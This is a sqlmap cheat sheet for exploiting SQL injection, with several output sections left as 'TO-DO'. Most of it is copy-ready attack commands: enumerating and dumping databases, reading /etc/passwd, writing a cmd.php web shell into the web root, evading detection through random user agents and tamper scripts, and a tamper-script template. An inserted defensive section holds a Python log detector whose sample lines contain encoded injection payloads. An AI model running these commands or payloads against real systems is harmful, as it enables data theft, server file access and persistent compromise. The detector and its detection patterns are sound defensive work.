1. Copy HTTP Request
+---------------------------------------------------------------+
| In Burp Suite => Right click request => Select `copy to file` |
| Add `*` to the SQL injection point                            |
+---------------------------------------------------------------+
Sample Output:
TO-DO
2. Initial Enum
# HTTP
sqlmap -r request --batch --banner --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10
Sample Output:
TO-DO
# HTTPS
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --force-ssl
Sample Output:
TO-DO
# String that appears in the response only when the injected condition evaluates to True
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --string '<STRING>'
Example:
# e.g. `Invalid User` vs 500 Internal Server Error
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --string 'Invalid User'
# Specify Technique
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --technique <TECHNIQUE>
Sample Output:
TO-DO
+------------------------+
| B: Boolean-based blind |
| E: Error-based         |
| U: Union query-based   |
| S: Stacked queries     |
| T: Time-based blind    |
| Q: Inline queries      |
+------------------------+
3. Database Enum
# Get Databases
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --dbs
Sample Output:
TO-DO
# Get Tables
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 -D <DB_NAME> --tables
Sample Output:
TO-DO
# Dump Table
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 -D <DB_NAME> -T <TABLE_NAME> --dump
Sample Output:
TO-DO
# Dump All Tables (Slow)
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 -D <DB_NAME> --dump
Sample Output:
TO-DO
4. Advanced
# File Read
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --random-agent --file-read <FILE>
Example:
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --random-agent --file-read /etc/passwd
# File Write
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --random-agent --file-write <FILE> --file-dest <FILE_DEST>
Example:
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --random-agent --file-write ./cmd.php --file-dest /var/www/html/cmd.php
# Add Payload Tampering Script
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --tamper <TAMPER_SCRIPT>
Example:
# e.g. randomcase
sqlmap -r request --batch --proxy=http://127.0.0.1:8080 --level 3 --risk 3 --threads=10 --tamper randomcase
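The two options above (--random-agent and --tamper randomcase) are exactly the ones that break naive server-side detection: the first replaces sqlmap's default User-Agent, the second changes the case of SQL keywords. The following is an added example, not part of this cheat sheet and not sqlmap code: a small Python detector that parses constructed access-log lines (combined log format) and flags clients by three signals that survive those options: the default User-Agent where it is still present, case-insensitive keyword matching on the URL-decoded query string, and the per-client count of 5xx responses. The IPs, timestamps, paths, the "sqlmap/1.x#stable" agent string, and the indicator names are all constructed for illustration.

```python
#!/usr/bin/env python3
"""Flag sqlmap-style activity in web server access logs (added example, not sqlmap code)."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines in combined log format; IPs, timestamps, paths and
# user agents are made up for this example. Line 2 carries a sqlmap-style
# default User-Agent; lines 3-5 imitate --random-agent plus the randomcase tamper.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /login?user=admin HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:12:00:01 +0000] "GET /login?user=admin%27%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.x#stable (https://sqlmap.org)"
10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "GET /login?user=admin%27%20aNd%20SlEeP%285%29--%20 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0)"
10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "GET /login?user=admin%27%20UnIoN%20SeLeCt%20NULL--%20 HTTP/1.1" 500 128 "-" "Mozilla/5.0 (Macintosh)"
10.0.0.9 - - [01/Jan/2024:12:00:03 +0000] "GET /login?user=admin%27%20AND%20LOAD_FILE%28%27/etc/passwd%27%29 HTTP/1.1" 500 128 "-" "Mozilla/5.0 (X11)"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Compiled with re.IGNORECASE so that case-mangled keywords (the effect of the
# randomcase tamper) match just like their upper-case forms. Patterns are
# applied to the URL-decoded query string, not the raw percent-encoded one.
SQLI_PATTERNS = {
    "boolean": re.compile(r"\b(?:and|or)\b\s+\d+\s*=\s*\d+", re.I),
    "time": re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(", re.I),
    "union": re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I),
    "file": re.compile(r"\b(?:load_file|into\s+(?:out|dump)file)\b", re.I),
}


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    path, _, query = rec["path"].partition("?")
    rec["path"] = path
    rec["query"] = unquote_plus(query)  # decode %27, %20, + etc. before matching
    return rec


def classify(rec):
    """Return the indicator names that fire for one parsed record."""
    hits = []
    # Default User-Agent check: cheap, but defeated by --random-agent, which is
    # why the content-based patterns below are needed as well.
    if "sqlmap" in rec["ua"].lower():
        hits.append("ua:sqlmap")
    for name, pat in SQLI_PATTERNS.items():
        if pat.search(rec["query"]):
            hits.append("sqli:" + name)
    return hits


def analyse(log_text):
    """Aggregate per-client request counts, 5xx counts and indicator hits."""
    per_ip = defaultdict(lambda: {"requests": 0, "errors": 0, "indicators": {}})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        stats = per_ip[rec["ip"]]
        stats["requests"] += 1
        if rec["status"] >= 500:
            stats["errors"] += 1  # error-based probing tends to raise 5xx rates
        for hit in classify(rec):
            stats["indicators"][hit] = stats["indicators"].get(hit, 0) + 1
    return dict(per_ip)


def suspicious_ips(log_text, error_threshold=2):
    """Clients with any injection indicator, or with too many server errors."""
    return sorted(
        ip for ip, s in analyse(log_text).items()
        if s["indicators"] or s["errors"] >= error_threshold
    )


if __name__ == "__main__":
    for ip, stats in analyse(SAMPLE_LOG).items():
        print(ip, stats)
    print("suspicious:", suspicious_ips(SAMPLE_LOG))
```

Run it as a script to print the per-client summary, or feed real log text to analyse() / suspicious_ips(). The design point is that the User-Agent rule alone only catches line 2; lines 3 to 5 are caught by the keyword rules because they run on the decoded query with case folding, and the 5xx count gives a third, payload-independent signal for error-based probing.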
# Check Privileges
sqlmap -r request --privileges
Sample Output:
TO-DO
tamper.py Template
#!/usr/bin/env python3
from lib.core.enums import PRIORITY

# Order in which sqlmap applies this script relative to other tamper scripts
__priority__ = PRIORITY.NORMAL

def dependencies():
    # Called once before use; report any required DBMS or version here
    pass

def tamper(payload, **kwargs):
    # Receives each payload string; must return the (modified) payload
    return payload
Sample Output:
TO-DO
Note: Create an empty __init__.py in the same folder as the tamper script.